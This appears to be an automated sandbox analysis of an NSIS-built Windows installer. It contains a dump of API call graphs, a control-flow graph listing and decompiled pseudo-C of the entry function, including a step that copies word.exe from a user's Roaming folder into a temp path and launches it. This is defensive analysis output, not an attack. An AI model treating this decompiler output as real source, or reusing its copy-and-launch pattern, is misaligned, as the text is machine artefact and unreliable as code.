4305->4311 4328 404a32 4307->4328 4308->4306 4314 4049d8 SendMessageW 4308->4314 4309->4308 4310 40491a 4325 404a0e 4310->4325 4322 4045e6 EnableWindow 4311->4322 4314->4306 4317 40482d GetDlgItem 4323 4045f9 SendMessageW 4317->4323 4319 404843 SendMessageW 4320 404860 GetSysColor 4319->4320 4321 404869 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4319->4321 4320->4321 4321->4306 4322->4317 4323->4319 4324->4310 4326 404a21 SendMessageW 4325->4326 4327 404a1c 4325->4327 4326->4293 4327->4326 4331 405c8e ShellExecuteExW 4328->4331 4330 404998 LoadCursorW SetCursor 4330->4299 4331->4330 4332 402383 4333 40238a 4332->4333 4336 40239d 4332->4336 4334 4066a5 17 API calls 4333->4334 4335 402397 4334->4335 4337 405cc8 MessageBoxIndirectW 4335->4337 4337->4336 4338 402c05 SendMessageW 4339 402c2a 4338->4339 4340 402c1f InvalidateRect 4338->4340 4340->4339 4341 405809 4342 4059b3 4341->4342 4343 40582a GetDlgItem GetDlgItem GetDlgItem 4341->4343 4345 4059e4 4342->4345 4346 4059bc GetDlgItem CreateThread CloseHandle 4342->4346 4386 4045f9 SendMessageW 4343->4386 4348 405a0f 4345->4348 4349 405a34 4345->4349 4350 4059fb ShowWindow ShowWindow 4345->4350 4346->4345 4347 40589a 4352 4058a1 GetClientRect GetSystemMetrics SendMessageW SendMessageW 4347->4352 4351 405a6f 4348->4351 4354 405a23 4348->4354 4355 405a49 ShowWindow 4348->4355 4356 40462b 8 API calls 4349->4356 4388 4045f9 SendMessageW 4350->4388 4351->4349 4361 405a7d SendMessageW 4351->4361 4359 4058f3 SendMessageW SendMessageW 4352->4359 4360 40590f 4352->4360 4362 40459d SendMessageW 4354->4362 4357 405a69 4355->4357 4358 405a5b 4355->4358 4367 405a42 4356->4367 4364 40459d SendMessageW 4357->4364 4363 4056ca 24 API calls 4358->4363 4359->4360 4365 405922 4360->4365 4366 405914 SendMessageW 4360->4366 4361->4367 4368 405a96 CreatePopupMenu 4361->4368 4362->4349 4363->4357 4364->4351 4370 4045c4 18 API calls 4365->4370 4366->4365 4369 4066a5 17 API calls 4368->4369 4371 405aa6 AppendMenuW 4369->4371 4372 405932 4370->4372 4373 405ac3 GetWindowRect 4371->4373 4374 405ad6 TrackPopupMenu 4371->4374 4375 40593b ShowWindow 4372->4375 4376 40596f GetDlgItem SendMessageW 4372->4376 4373->4374 4374->4367 4378 405af1 4374->4378 4379 405951 ShowWindow 4375->4379 4380 40595e 4375->4380 4376->4367 4377 405996 SendMessageW SendMessageW 4376->4377 4377->4367 4381 405b0d SendMessageW 4378->4381 4379->4380 4387 4045f9 SendMessageW 4380->4387 4381->4381 4382 405b2a OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4381->4382 4384 405b4f SendMessageW 4382->4384 4384->4384 4385 405b78 GlobalUnlock SetClipboardData CloseClipboard 4384->4385 4385->4367 4386->4347 4387->4376 4388->4348 4389 40248a 4390 402da6 17 API calls 4389->4390 4391 40249c 4390->4391 4392 402da6 17 API calls 4391->4392 4393 4024a6 4392->4393 4406 402e36 4393->4406 4396 40292e 4397 4024de 4399 4024ea 4397->4399 4402 402d84 17 API calls 4397->4402 4398 402da6 17 API calls 4401 4024d4 lstrlenW 4398->4401 4400 402509 RegSetValueExW 4399->4400 4403 403371 44 API calls 4399->4403 4404 40251f RegCloseKey 4400->4404 4401->4397 4402->4399 4403->4400 4404->4396 4407 402e51 4406->4407 4410 406503 4407->4410 4411 406512 4410->4411 4412 4024b6 4411->4412 4413 40651d RegCreateKeyExW 4411->4413 4412->4396 4412->4397 4412->4398 4413->4412 4414 404e0b 4415 404e37 4414->4415 4416 404e1b 4414->4416 4418 404e6a 4415->4418 4419 404e3d SHGetPathFromIDListW 4415->4419 4425 405cac GetDlgItemTextW 4416->4425 4420 404e54 SendMessageW 4419->4420 4421 404e4d 4419->4421 4420->4418 4423 40140b 2 API calls 4421->4423 4422 404e28 SendMessageW 4422->4415 4423->4420 4425->4422 4426 40290b 4427 402da6 17 API calls 4426->4427 4428 402912 FindFirstFileW 4427->4428 4429 40293a 4428->4429 4433 402925 4428->4433 4434 4065af wsprintfW 4429->4434 4431 402943 4435 406668 lstrcpynW 4431->4435 4434->4431 4435->4433 4436 40190c 4437 401943 4436->4437 4438 402da6 17 API calls 4437->4438 4439 401948 4438->4439 4440 405d74 67 API calls 4439->4440 4441 401951 4440->4441 4442 40190f 4443 402da6 17 API calls 4442->4443 4444 401916 4443->4444 4445 405cc8 MessageBoxIndirectW 4444->4445 4446 40191f 4445->4446 4447 401491 4448 4056ca 24 API calls 4447->4448 4449 401498 4448->4449 4450 402891 4451 402898 4450->4451 4452 402ba9 4450->4452 4453 402d84 17 API calls 4451->4453 4454 40289f 4453->4454 4455 4028ae SetFilePointer 4454->4455 4455->4452 4456 4028be 4455->4456 4458 4065af wsprintfW 4456->4458 4458->4452 4459 401f12 4460 402da6 17 API calls 4459->4460 4461 401f18 4460->4461 4462 402da6 17 API calls 4461->4462 4463 401f21 4462->4463 4464 402da6 17 API calls 4463->4464 4465 401f2a 4464->4465 4466 402da6 17 API calls 4465->4466 4467 401f33 4466->4467 4468 401423 24 API calls 4467->4468 4469 401f3a 4468->4469 4476 405c8e ShellExecuteExW 4469->4476 4471 401f82 4472 406ae0 5 API calls 4471->4472 4474 40292e 4471->4474 4473 401f9f CloseHandle 4472->4473 4473->4474 4476->4471 4477 402f93 4478 402fa5 SetTimer 4477->4478 4479 402fbe 4477->4479 4478->4479 4480 40300c 4479->4480 4481 403012 MulDiv 4479->4481 4482 402fcc wsprintfW SetWindowTextW SetDlgItemTextW 4481->4482 4482->4480 4498 401d17 4499 402d84 17 API calls 4498->4499 4500 401d1d IsWindow 4499->4500 4501 401a20 4500->4501 4502 401b9b 4503 401ba8 4502->4503 4504 401bec 4502->4504 4511 401bbf 4503->4511 4513 401c31 4503->4513 4505 401bf1 4504->4505 4506 401c16 GlobalAlloc 4504->4506 4510 40239d 4505->4510 4523 406668 lstrcpynW 4505->4523 4508 4066a5 17 API calls 4506->4508 4507 4066a5 17 API calls 4509 402397 4507->4509 4508->4513 4517 405cc8 MessageBoxIndirectW 4509->4517 4521 406668 lstrcpynW 4511->4521 4513->4507 4513->4510 4515 401c03 GlobalFree 4515->4510 4516 401bce 4522 406668 lstrcpynW 4516->4522 4517->4510 4519 401bdd 4524 406668 lstrcpynW 4519->4524 4521->4516 4522->4519 4523->4515 4524->4510 4525 40261c 4526 402da6 17 API calls 4525->4526 4527 402623 4526->4527 4530 406158 GetFileAttributesW CreateFileW 4527->4530 4529 40262f 4530->4529 4538 40149e 4539 4014ac PostQuitMessage 4538->4539 4540 40239d 4538->4540 4539->4540 4541 40259e 4551 402de6 4541->4551 4544 402d84 17 API calls 4545 4025b1 4544->4545 4546 4025d9 RegEnumValueW 4545->4546 4547 4025cd RegEnumKeyW 4545->4547 4549 40292e 4545->4549 4548 4025ee RegCloseKey 4546->4548 4547->4548 4548->4549 4552 402da6 17 API calls 4551->4552 4553 402dfd 4552->4553 4554 4064d5 RegOpenKeyExW 4553->4554 4555 4025a8 4554->4555 4555->4544 4556 4015a3 4557 402da6 17 API calls 4556->4557 4558 4015aa SetFileAttributesW 4557->4558 4559 4015bc 4558->4559 3755 401fa4 3756 402da6 17 API calls 3755->3756 3757 401faa 3756->3757 3758 4056ca 24 API calls 3757->3758 3759 401fb4 3758->3759 3760 405c4b 2 API calls 3759->3760 3761 401fba 3760->3761 3762 401fdd CloseHandle 3761->3762 3766 40292e 3761->3766 3770 406ae0 WaitForSingleObject 3761->3770 3762->3766 3765 401fcf 3767 401fd4 3765->3767 3768 401fdf 3765->3768 3775 4065af wsprintfW 3767->3775 3768->3762 3771 406afa 3770->3771 3772 406b0c GetExitCodeProcess 3771->3772 3773 406a71 2 API calls 3771->3773 3772->3765 3774 406b01 WaitForSingleObject 3773->3774 3774->3771 3775->3762 3875 403c25 3876 403c40 3875->3876 3877 403c36 CloseHandle 3875->3877 3878 403c54 3876->3878 3879 403c4a CloseHandle 3876->3879 3877->3876 3884 403c82 3878->3884 3879->3878 3882 405d74 67 API calls 3883 403c65 3882->3883 3885 403c90 3884->3885 3886 403c59 3885->3886 3887 403c95 FreeLibrary GlobalFree 3885->3887 3886->3882 3887->3886 3887->3887 4560 40202a 4561 402da6 17 API calls 4560->4561 4562 402031 4561->4562 4563 406a35 5 API calls 4562->4563 4564 402040 4563->4564 4565 40205c GlobalAlloc 4564->4565 4566 4020cc 4564->4566 4565->4566 4567 402070 4565->4567 4568 406a35 5 API calls 4567->4568 4569 402077 4568->4569 4570 406a35 5 API calls 4569->4570 4571 402081 4570->4571 4571->4566 4575 4065af wsprintfW 4571->4575 4573 4020ba 4576 4065af wsprintfW 4573->4576 4575->4573 4576->4566 4577 40252a 4578 402de6 17 API calls 4577->4578 4579 402534 4578->4579 4580 402da6 17 API calls 4579->4580 4581 40253d 4580->4581 4582 402548 RegQueryValueExW 4581->4582 4585 40292e 4581->4585 4583 40256e RegCloseKey 4582->4583 4584 402568 4582->4584 4583->4585 4584->4583 4588 4065af wsprintfW 4584->4588 4588->4583 4589 4021aa 4590 402da6 17 API calls 4589->4590 4591 4021b1 4590->4591 4592 402da6 17 API calls 4591->4592 4593 4021bb 4592->4593 4594 402da6 17 API calls 4593->4594 4595 4021c5 4594->4595 4596 402da6 17 API calls 4595->4596 4597 4021cf 4596->4597 4598 402da6 17 API calls 4597->4598 4599 4021d9 4598->4599 4600 402218 CoCreateInstance 4599->4600 4601 402da6 17 API calls 4599->4601 4604 402237 4600->4604 4601->4600 4602 401423 24 API calls 4603 4022f6 4602->4603 4604->4602 4604->4603 4612 401a30 4613 402da6 17 API calls 4612->4613 4614 401a39 ExpandEnvironmentStringsW 4613->4614 4615 401a60 4614->4615 4616 401a4d 4614->4616 4616->4615 4617 401a52 lstrcmpW 4616->4617 4617->4615 4618 405031 GetDlgItem GetDlgItem 4619 405083 7 API calls 4618->4619 4620 4052a8 4618->4620 4621 40512a DeleteObject 4619->4621 4622 40511d SendMessageW 4619->4622 4625 40538a 4620->4625 4652 405317 4620->4652 4672 404f7f SendMessageW 4620->4672 4623 405133 4621->4623 4622->4621 4624 40516a 4623->4624 4628 4066a5 17 API calls 4623->4628 4626 4045c4 18 API calls 4624->4626 4627 405436 4625->4627 4631 40529b 4625->4631 4637 4053e3 SendMessageW 4625->4637 4630 40517e 4626->4630 4632 405440 SendMessageW 4627->4632 4633 405448 4627->4633 4629 40514c SendMessageW SendMessageW 4628->4629 4629->4623 4636 4045c4 18 API calls 4630->4636 4634 40462b 8 API calls 4631->4634 4632->4633 4640 405461 4633->4640 4641 40545a ImageList_Destroy 4633->4641 4648 405471 4633->4648 4639 405637 4634->4639 4653 40518f 4636->4653 4637->4631 4643 4053f8 SendMessageW 4637->4643 4638 40537c SendMessageW 4638->4625 4644 40546a GlobalFree 4640->4644 4640->4648 4641->4640 4642 4055eb 4642->4631 4649 4055fd ShowWindow GetDlgItem ShowWindow 4642->4649 4646 40540b 4643->4646 4644->4648 4645 40526a GetWindowLongW SetWindowLongW 4647 405283 4645->4647 4657 40541c SendMessageW 4646->4657 4650 4052a0 4647->4650 4651 405288 ShowWindow 4647->4651 4648->4642 4665 4054ac 4648->4665 4677 404fff 4648->4677 4649->4631 4671 4045f9 SendMessageW 4650->4671 4670 4045f9 SendMessageW 4651->4670 4652->4625 4652->4638 4653->4645 4656 4051e2 SendMessageW 4653->4656 4658 405265 4653->4658 4659 405220 SendMessageW 4653->4659 4660 405234 SendMessageW 4653->4660 4656->4653 4657->4627 4658->4645 4658->4647 4659->4653 4660->4653 4662 4055b6 4663 4055c1 InvalidateRect 4662->4663 4666 4055cd 4662->4666 4663->4666 4664 4054da SendMessageW 4668 4054f0 4664->4668 4665->4664 4665->4668 4666->4642 4686 404f3a 4666->4686 4667 405564 SendMessageW SendMessageW 4667->4668 4668->4662 4668->4667 4670->4631 4671->4620 4673 404fa2 GetMessagePos ScreenToClient SendMessageW 4672->4673 4674 404fde SendMessageW 4672->4674 4675 404fd6 4673->4675 4676 404fdb 4673->4676 4674->4675 4675->4652 4676->4674 4689 406668 lstrcpynW 4677->4689 4679 405012 4690 4065af wsprintfW 4679->4690 4681 40501c 4682 40140b 2 API calls 4681->4682 4683 405025 4682->4683 4691 406668 lstrcpynW 4683->4691 4685 40502c 4685->4665 4692 404e71 4686->4692 4688 404f4f 4688->4642 4689->4679 4690->4681 4691->4685 4693 404e8a 4692->4693 4694 4066a5 17 API calls 4693->4694 4695 404eee 4694->4695 4696 4066a5 17 API calls 4695->4696 4697 404ef9 4696->4697 4698 4066a5 17 API calls 4697->4698 4699 404f0f lstrlenW wsprintfW SetDlgItemTextW 4698->4699 4699->4688 4705 4023b2 4706 4023ba 4705->4706 4709 4023c0 4705->4709 4707 402da6 17 API calls 4706->4707 4707->4709 4708 4023ce 4711 4023dc 4708->4711 4712 402da6 17 API calls 4708->4712 4709->4708 4710 402da6 17 API calls 4709->4710 4710->4708 4713 402da6 17 API calls 4711->4713 4712->4711 4714 4023e5 WritePrivateProfileStringW 4713->4714 4715 404734 lstrlenW 4716 404753 4715->4716 4717 404755 WideCharToMultiByte 4715->4717 4716->4717 4718 402434 4719 402467 4718->4719 4720 40243c 4718->4720 4722 402da6 17 API calls 4719->4722 4721 402de6 17 API calls 4720->4721 4723 402443 4721->4723 4724 40246e 4722->4724 4726 402da6 17 API calls 4723->4726 4728 40247b 4723->4728 4729 402e64 4724->4729 4727 402454 RegDeleteValueW RegCloseKey 4726->4727 4727->4728 4730 402e78 4729->4730 4732 402e71 4729->4732 4730->4732 4733 402ea9 4730->4733 4732->4728 4734 4064d5 RegOpenKeyExW 4733->4734 4735 402ed7 4734->4735 4736 402ee7 RegEnumValueW 4735->4736 4743 402f81 4735->4743 4745 402f0a 4735->4745 4737 402f71 RegCloseKey 4736->4737 4736->4745 4737->4743 4738 402f46 RegEnumKeyW 4739 402f4f RegCloseKey 4738->4739 4738->4745 4740 406a35 5 API calls 4739->4740 4741 402f5f 4740->4741 4741->4743 4744 402f63 RegDeleteKeyW 4741->4744 4742 402ea9 6 API calls 4742->4745 4743->4732 4744->4743 4745->4737 4745->4738 4745->4739 4745->4742 4746 401735 4747 402da6 17 API calls 4746->4747 4748 40173c SearchPathW 4747->4748 4749 401757 4748->4749 4750 404ab5 4751 404ae1 4750->4751 4752 404af2 4750->4752 4811 405cac GetDlgItemTextW 4751->4811 4754 404afe GetDlgItem 4752->4754 4759 404b5d 4752->4759 4757 404b12 4754->4757 4755 404c41 4760 404df0 4755->4760 4813 405cac GetDlgItemTextW 4755->4813 4756 404aec 4758 4068ef 5 API calls 4756->4758 4762 404b26 SetWindowTextW 4757->4762 4763 405fe2 4 API calls 4757->4763 4758->4752 4759->4755 4759->4760 4764 4066a5 17 API calls 4759->4764 4767 40462b 8 API calls 4760->4767 4766 4045c4 18 API calls 4762->4766 4768 404b1c 4763->4768 4769 404bd1 SHBrowseForFolderW 4764->4769 4765 404c71 4770 40603f 18 API calls 4765->4770 4771 404b42 4766->4771 4772 404e04 4767->4772 4768->4762 4776 405f37 3 API calls 4768->4776 4769->4755 4773 404be9 CoTaskMemFree 4769->4773 4774 404c77 4770->4774 4775 4045c4 18 API calls 4771->4775 4777 405f37 3 API calls 4773->4777 4814 406668 lstrcpynW 4774->4814 4778 404b50 4775->4778 4776->4762 4779 404bf6 4777->4779 4812 4045f9 SendMessageW 4778->4812 4782 404c2d SetDlgItemTextW 4779->4782 4787 4066a5 17 API calls 4779->4787 4782->4755 4783 404b56 4785 406a35 5 API calls 4783->4785 4784 404c8e 4786 406a35 5 API calls 4784->4786 4785->4759 4793 404c95 4786->4793 4788 404c15 lstrcmpiW 4787->4788 4788->4782 4791 404c26 lstrcatW 4788->4791 4789 404cd6 4815 406668 lstrcpynW 4789->4815 4791->4782 4792 404cdd 4794 405fe2 4 API calls 4792->4794 4793->4789 4797 405f83 2 API calls 4793->4797 4799 404d2e 4793->4799 4795 404ce3 GetDiskFreeSpaceW 4794->4795 4798 404d07 MulDiv 4795->4798 4795->4799 4797->4793 4798->4799 4801 404f3a 20 API calls 4799->4801 4809 404d9f 4799->4809 4800 404dc2 4816 4045e6 EnableWindow 4800->4816 4803 404d8c 4801->4803 4802 40140b 2 API calls 4802->4800 4805 404da1 SetDlgItemTextW 4803->4805 4806 404d91 4803->4806 4805->4809 4807 404e71 20 API calls 4806->4807 4807->4809 4808 404dde 4808->4760 4810 404a0e SendMessageW 4808->4810 4809->4800 4809->4802 4810->4760 4811->4756 4812->4783 4813->4765 4814->4784 4815->4792 4816->4808 4817 401d38 4818 402d84 17 API calls 4817->4818 4819 401d3f 4818->4819 4820 402d84 17 API calls 4819->4820 4821 401d4b GetDlgItem 4820->4821 4822 402638 4821->4822 4823 4014b8 4824 4014be 4823->4824 4825 401389 2 API calls 4824->4825 4826 4014c6 4825->4826 4827 40563e 4828 405662 4827->4828 4829 40564e 4827->4829 4832 40566a IsWindowVisible 4828->4832 4838 405681 4828->4838 4830 405654 4829->4830 4831 4056ab 4829->4831 4834 404610 SendMessageW 4830->4834 4833 4056b0 CallWindowProcW 4831->4833 4832->4831 4835 405677 4832->4835 4836 40565e 4833->4836 4834->4836 4837 404f7f 5 API calls 4835->4837 4837->4838 4838->4833 4839 404fff 4 API calls 4838->4839 4839->4831 4840 40263e 4841 402652 4840->4841 4842 40266d 4840->4842 4843 402d84 17 API calls 4841->4843 4844 402672 4842->4844 4845 40269d 4842->4845 4854 402659 4843->4854 4847 402da6 17 API calls 4844->4847 4846 402da6 17 API calls 4845->4846 4849 4026a4 lstrlenW 4846->4849 4848 402679 4847->4848 4857 40668a WideCharToMultiByte 4848->4857 4849->4854 4851 40268d lstrlenA 4851->4854 4852 4026e7 4853 4026d1 4853->4852 4855 40620a WriteFile 4853->4855 4854->4852 4854->4853 4856 406239 5 API calls 4854->4856 4855->4852 4856->4853 4857->4851

                                    Executed Functions

                                    Function 00403640 Relevance: 84.4, APIs: 34, Strings: 14, Instructions: 450stringfilecomCOMMON
                                    Download Yara Rule

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 0 403640-403690 SetErrorMode GetVersionExW 1 403692-4036c6 GetVersionExW 0->1 2 4036ca-4036d1 0->2 1->2 3 4036d3 2->3 4 4036db-40371b 2->4 3->4 5 40371d-403725 call 406a35 4->5 6 40372e 4->6 5->6 11 403727 5->11 8 403733-403747 call 4069c5 lstrlenA 6->8 13 403749-403765 call 406a35 * 3 8->13 11->6 20 403776-4037d8 #17 OleInitialize SHGetFileInfoW call 406668 GetCommandLineW call 406668 13->20 21 403767-40376d 13->21 28 4037e1-4037f4 call 405f64 CharNextW 20->28 29 4037da-4037dc 20->29 21->20 25 40376f 21->25 25->20 32 4038eb-4038f1 28->32 29->28 33 4038f7 32->33 34 4037f9-4037ff 32->34 37 40390b-403925 GetTempPathW call 40360f 33->37 35 403801-403806 34->35 36 403808-40380e 34->36 35->35 35->36 38 403810-403814 36->38 39 403815-403819 36->39 47 403927-403945 GetWindowsDirectoryW lstrcatW call 40360f 37->47 48 40397d-403995 DeleteFileW call 4030d0 37->48 38->39 41 4038d9-4038e7 call 405f64 39->41 42 40381f-403825 39->42 41->32 58 4038e9-4038ea 41->58 45 403827-40382e 42->45 46 40383f-403878 42->46 51 403830-403833 45->51 52 403835 45->52 53 403894-4038ce 46->53 54 40387a-40387f 46->54 47->48 62 403947-403977 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 40360f 47->62 64 40399b-4039a1 48->64 65 403b6c-403b7a ExitProcess OleUninitialize 48->65 51->46 51->52 52->46 56 4038d0-4038d4 53->56 57 4038d6-4038d8 53->57 54->53 60 403881-403889 54->60 56->57 63 4038f9-403906 call 406668 56->63 57->41 58->32 66 403890 60->66 67 40388b-40388e 60->67 62->48 62->65 63->37 69 4039a7-4039ba call 405f64 64->69 70 403a48-403a4f call 403d17 64->70 72 403b91-403b97 65->72 73 403b7c-403b8b call 405cc8 ExitProcess 65->73 66->53 67->53 67->66 88 403a0c-403a19 69->88 89 4039bc-4039f1 69->89 83 403a54-403a57 70->83 74 403b99-403bae GetCurrentProcess OpenProcessToken 72->74 75 403c0f-403c17 72->75 80 403bb0-403bd9 LookupPrivilegeValueW AdjustTokenPrivileges 74->80 81 403bdf-403bed call 406a35 74->81 84 403c19 75->84 85 403c1c-403c1f ExitProcess 75->85 80->81 95 403bfb-403c06 ExitWindowsEx 81->95 96 403bef-403bf9 81->96 83->65 84->85 90 403a1b-403a29 call 40603f 88->90 91 403a5c-403a70 call 405c33 lstrcatW 88->91 93 4039f3-4039f7 89->93 90->65 104 403a2f-403a45 call 406668 * 2 90->104 107 403a72-403a78 lstrcatW 91->107 108 403a7d-403a97 lstrcatW lstrcmpiW 91->108 98 403a00-403a08 93->98 99 4039f9-4039fe 93->99 95->75 101 403c08-403c0a call 40140b 95->101 96->95 96->101 98->93 103 403a0a 98->103 99->98 99->103 101->75 103->88 104->70 107->108 109 403b6a 108->109 110 403a9d-403aa0 108->110 109->65 112 403aa2-403aa7 call 405b99 110->112 113 403aa9 call 405c16 110->113 119 403aae-403abe SetCurrentDirectoryW 112->119 113->119 121 403ac0-403ac6 call 406668 119->121 122 403acb-403af7 call 406668 119->122 121->122 126 403afc-403b17 call 4066a5 DeleteFileW 122->126 129 403b57-403b61 126->129 130 403b19-403b29 CopyFileW 126->130 129->126 132 403b63-403b65 call 406428 129->132 130->129 131 403b2b-403b4b call 406428 call 4066a5 call 405c4b 130->131 131->129 140 403b4d-403b54 CloseHandle 131->140 132->109 140->129
                                    C-Code - Quality: 78%
                                    			_entry_() {
				WCHAR* _v8;
				signed int _v12;
				void* _v16;
				signed int _v20;
				int _v24;
				int _v28;
				struct _TOKEN_PRIVILEGES _v40;
				signed char _v42;
				int _v44;
				signed int _v48;
				intOrPtr _v278;
				signed short _v310;
				struct _OSVERSIONINFOW _v324;
				struct _SHFILEINFOW _v1016;
				intOrPtr* _t88;
				intOrPtr* _t94;
				void _t97;
				void* _t116;
				WCHAR* _t118;
				signed int _t119;
				intOrPtr* _t123;
				void* _t137;
				void* _t143;
				void* _t148;
				void* _t152;
				void* _t157;
				signed int _t167;
				void* _t170;
				void* _t175;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t179;
				int _t188;
				void* _t189;
				void* _t198;
				signed int _t204;
				signed int _t209;
				signed int _t214;
				int* _t218;
				signed int _t226;
				signed int _t229;
				CHAR* _t231;
				signed int _t233;
				WCHAR* _t234;

				0x435000 = 0x20;
				_t188 = 0;
				_v24 = 0;
				_v8 = L"Error writing temporary file. Make sure your temp folder is valid.";
				_v20 = 0;
				SetErrorMode(0x8001); // executed
				_v324.szCSDVersion = 0;
				_v48 = 0;
				_v44 = 0;
				_v324.dwOSVersionInfoSize = 0x11c;
				if(GetVersionExW( &_v324) == 0) {
					_v324.dwOSVersionInfoSize = 0x114;
					GetVersionExW( &_v324);
					asm("sbb eax, eax");
					_v42 = 4;
					_v48 =  !( ~(_v324.szCSDVersion - 0x53)) & _v278 + 0xffffffd0;
				}
				if(_v324.dwMajorVersion < 0xa) {
					_v310 = _v310 & 0x00000000;
				}
				 *0x42a318 = _v324.dwBuildNumber;
				 *0x42a31c = (_v324.dwMajorVersion & 0x0000ffff | _v324.dwMinorVersion & 0x000000ff) << 0x00000010 | _v48 & 0x0000ffff | _v42 & 0x000000ff;
				if( *0x42a31e != 0x600) {
					_t179 = E00406A35(_t188);
					if(_t179 != _t188) {
						 *_t179(0xc00);
					}
				}
				_t231 = "UXTHEME";
				do {
					E004069C5(_t231); // executed
					_t231 =  &(_t231[lstrlenA(_t231) + 1]);
				} while ( *_t231 != 0);
				E00406A35(0xb);
				 *0x42a264 = E00406A35(9);
				_t88 = E00406A35(7);
				if(_t88 != _t188) {
					_t88 =  *_t88(0x1e);
					if(_t88 != 0) {
						 *0x42a31c =  *0x42a31c | 0x00000080;
					}
				}
				__imp__#17();
				__imp__OleInitialize(_t188); // executed
				 *0x42a320 = _t88;
				SHGetFileInfoW(0x421708, _t188,  &_v1016, 0x2b4, _t188); // executed
				E00406668(0x429260, L"NSIS Error");
				E00406668(0x435000, GetCommandLineW());
				_t94 = 0x435000;
				_t233 = 0x22;
				 *0x42a260 = 0x400000;
				if( *0x435000 == _t233) {
					_t94 = 0x435002;
				}
				_t198 = CharNextW(E00405F64(_t94, 0x435000));
				_v16 = _t198;
				while(1) {
					_t97 =  *_t198;
					_t251 = _t97 - _t188;
					if(_t97 == _t188) {
						break;
					}
					_t209 = 0x20;
					__eflags = _t97 - _t209;
					if(_t97 != _t209) {
						L17:
						__eflags =  *_t198 - _t233;
						_v12 = _t209;
						if( *_t198 == _t233) {
							_v12 = _t233;
							_t198 = _t198 + 2;
							__eflags = _t198;
						}
						__eflags =  *_t198 - 0x2f;
						if( *_t198 != 0x2f) {
							L32:
							_t198 = E00405F64(_t198, _v12);
							__eflags =  *_t198 - _t233;
							if(__eflags == 0) {
								_t198 = _t198 + 2;
								__eflags = _t198;
							}
							continue;
						} else {
							_t198 = _t198 + 2;
							__eflags =  *_t198 - 0x53;
							if( *_t198 != 0x53) {
								L24:
								asm("cdq");
								asm("cdq");
								_t214 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t226 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t214;
								__eflags =  *_t198 - (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214);
								if( *_t198 != (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t214)) {
									L29:
									asm("cdq");
									asm("cdq");
									_t209 = L" /D=" & 0x0000ffff;
									asm("cdq");
									_t229 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t209;
									__eflags =  *(_t198 - 4) - (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209);
									if( *(_t198 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t209)) {
										L31:
										_t233 = 0x22;
										goto L32;
									}
									__eflags =  *_t198 - _t229;
									if( *_t198 == _t229) {
										 *(_t198 - 4) = _t188;
										__eflags = _t198;
										E00406668(0x435800, _t198);
										L37:
										_t234 = L"C:\\Users\\Albus\\AppData\\Local\\Temp\\";
										GetTempPathW(0x400, _t234);
										_t116 = E0040360F(_t198, _t251);
										_t252 = _t116;
										if(_t116 != 0) {
											L40:
											DeleteFileW(L"1033"); // executed
											_t118 = E004030D0(_t254, _v20); // executed
											_v8 = _t118;
											if(_t118 != _t188) {
												L68:
												ExitProcess(); // executed
												__imp__OleUninitialize(); // executed
												if(_v8 == _t188) {
													if( *0x42a2f4 == _t188) {
														L77:
														_t119 =  *0x42a30c;
														if(_t119 != 0xffffffff) {
															_v24 = _t119;
														}
														ExitProcess(_v24);
													}
													if(OpenProcessToken(GetCurrentProcess(), 0x28,  &_v16) != 0) {
														LookupPrivilegeValueW(_t188, L"SeShutdownPrivilege",  &(_v40.Privileges));
														_v40.PrivilegeCount = 1;
														_v28 = 2;
														AdjustTokenPrivileges(_v16, _t188,  &_v40, _t188, _t188, _t188);
													}
													_t123 = E00406A35(4);
													if(_t123 == _t188) {
														L75:
														if(ExitWindowsEx(2, 0x80040002) != 0) {
															goto L77;
														}
														goto L76;
													} else {
														_push(0x80040002);
														_push(0x25);
														_push(_t188);
														_push(_t188);
														_push(_t188);
														if( *_t123() == 0) {
															L76:
															E0040140B(9);
															goto L77;
														}
														goto L75;
													}
												}
												E00405CC8(_v8, 0x200010);
												ExitProcess(2);
											}
											if( *0x42a27c == _t188) {
												L51:
												 *0x42a30c =  *0x42a30c | 0xffffffff;
												_v24 = E00403D17(_t264);
												goto L68;
											}
											_t218 = E00405F64(0x435000, _t188);
											if(_t218 < 0x435000) {
												L48:
												_t263 = _t218 - 0x435000;
												_v8 = L"Error launching installer";
												if(_t218 < 0x435000) {
													_t189 = E00405C33(__eflags);
													lstrcatW(_t234, L"~nsu");
													__eflags = _t189;
													if(_t189 != 0) {
														lstrcatW(_t234, "A");
													}
													lstrcatW(_t234, L".tmp");
													_t137 = lstrcmpiW(_t234, 0x436800);
													__eflags = _t137;
													if(_t137 == 0) {
														L67:
														_t188 = 0;
														__eflags = 0;
														goto L68;
													} else {
														__eflags = _t189;
														_push(_t234);
														if(_t189 == 0) {
															E00405C16();
														} else {
															E00405B99();
														}
														SetCurrentDirectoryW(_t234);
														__eflags =  *0x435800;
														if( *0x435800 == 0) {
															E00406668(0x435800, 0x436800);
														}
														E00406668(0x42b000, _v16);
														_t201 = "A" & 0x0000ffff;
														_t143 = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
														__eflags = _t143;
														_v12 = 0x1a;
														 *0x42b800 = _t143;
														do {
															E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x120)));
															DeleteFileW(0x420f08);
															__eflags = _v8;
															if(_v8 != 0) {
																_t148 = CopyFileW(L"C:\\Users\\Albus\\AppData\\Roaming\\word.exe", 0x420f08, 1);
																__eflags = _t148;
																if(_t148 != 0) {
																	E00406428(_t201, 0x420f08, 0);
																	E004066A5(0, 0x420f08, _t234, 0x420f08,  *((intOrPtr*)( *0x42a270 + 0x124)));
																	_t152 = E00405C4B(0x420f08);
																	__eflags = _t152;
																	if(_t152 != 0) {
																		CloseHandle(_t152);
																		_v8 = 0;
																	}
																}
															}
															 *0x42b800 =  *0x42b800 + 1;
															_t61 =  &_v12;
															 *_t61 = _v12 - 1;
															__eflags =  *_t61;
														} while ( *_t61 != 0);
														E00406428(_t201, _t234, 0);
